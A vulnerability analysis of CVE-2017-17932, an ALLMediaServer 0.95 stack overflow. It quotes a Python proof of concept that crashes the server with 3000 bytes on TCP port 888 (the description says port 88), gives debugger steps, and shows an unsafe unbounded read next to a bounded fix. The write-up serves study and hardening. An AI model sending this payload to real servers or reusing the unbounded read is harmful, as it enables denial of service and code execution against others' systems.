[CVE-2017-17932] ALLMediaServer 0.95 Remote Overflow Vulnerability Analysis
0x00 References
https://www.exploit-db.com/exploits/43406/
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. To exploit this vulnerability, an attacker must connect to the server with a long malicious string.
#
#
#2. Proof of Concept
#
```python
#!/usr/bin/python
# NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
import socket


def main():
    # Connect to the ALLMediaServer listener on TCP port 888.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.205.131', 888))
    # 3000 bytes of 'A' (0x41): longer than the server's receive buffer,
    # so the data overwrites the stack.
    buffer = b"A" * 3000
    s.send(buffer)
    s.close()


if __name__ == '__main__':
    main()
```
Change 192.168.205.131 to your own IP address.
0x01 Vulnerability Analysis
Reproduction environment: Windows 10, Python 2.7.0
Start ALLMediaServer, attach a debugger to MediaServer.exe, and use the PoC to send a TCP request to 127.0.0.1:888; this triggers the vulnerability and MediaServer.exe crashes.
You can see that the current stack has been overwritten with 0x41.
Starting from the crash point, buf = 0534F910 (this value changes between runs), locate the place where the vulnerability is triggered.
Send the first request.
Looking at the contents of buf, there is no overflow yet; the server has only initialized some data.
First set a hardware breakpoint on this address, then send the second request; at this point execution breaks at a location inside the accept function.
Keep single-stepping until you reach the code that receives the data.
Step into it.
You can see that all of the received data is read into buf, which causes the overflow.
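The receive pattern the analysis ends on (everything the peer sends copied into a fixed stack buffer) beside a bounded version, as an added illustration that is not MediaServer.exe's code: the 256-byte buffer size, the `read_fn` abstraction standing in for `recv()`, and the in-memory peer are all assumptions; the 3000-byte run of 'A' matches the PoC above.

```c
#include <string.h>

/* Reader standing in for recv(): bytes produced, 0 at end of stream, -1 on error. */
typedef long (*read_fn)(void *ctx, char *dst, size_t cap);

/* Constructed in-memory peer: hands the payload out in 512-byte pieces, like
 * a send() whose data arrived split across several TCP segments. */
struct mem_src { const char *data; size_t len, pos; };
static long mem_read(void *ctx, char *dst, size_t cap) {
    struct mem_src *m = ctx;
    size_t n = m->len - m->pos;
    if (n > cap) n = cap;
    if (n > 512) n = 512;
    memcpy(dst, m->data + m->pos, n);
    m->pos += n;
    return (long)n;
}

/* The pattern the analysis describes: everything received is read into a fixed
 * stack buffer with no bound, so the 3000-byte request overwrites the stack.
 * Shown for contrast only; never called. */
long read_request_unbounded(read_fn rd, void *ctx) {
    char buf[256];
    return rd(ctx, buf, 65535);          /* cap passed exceeds sizeof buf */
}

/* Hardened: never read past cap-1 bytes; if the peer still has more, reject the
 * whole request instead of truncating it silently. Returns bytes kept, or -1. */
long read_request_bounded(read_fn rd, void *ctx, char *buf, size_t cap) {
    size_t total = 0; char probe;
    if (cap == 0) return -1;
    for (;;) {
        size_t room = cap - 1 - total;
        long n = room ? rd(ctx, buf + total, room) : rd(ctx, &probe, 1);
        if (n < 0) return -1;
        if (n == 0) break;
        if (!room) return -1;            /* buffer full but data still arriving */
        total += (size_t)n;
    }
    buf[total] = '\0';
    return (long)total;
}

/* Feeds `len` bytes of 'A' (3000 reproduces the PoC) into a `cap`-byte buffer. */
long demo(size_t len, size_t cap) {
    static char payload[4096], buf[4096];
    struct mem_src src = { payload, len, 0 };
    if (len > sizeof payload || cap > sizeof buf) return -1;
    memset(payload, 'A', len);
    return read_request_bounded(mem_read, &src, buf, cap);
}
```

With a 256-byte buffer the PoC payload is rejected before a single byte lands past the buffer, while a buffer large enough to hold it (or ordinary short requests) is accepted unchanged.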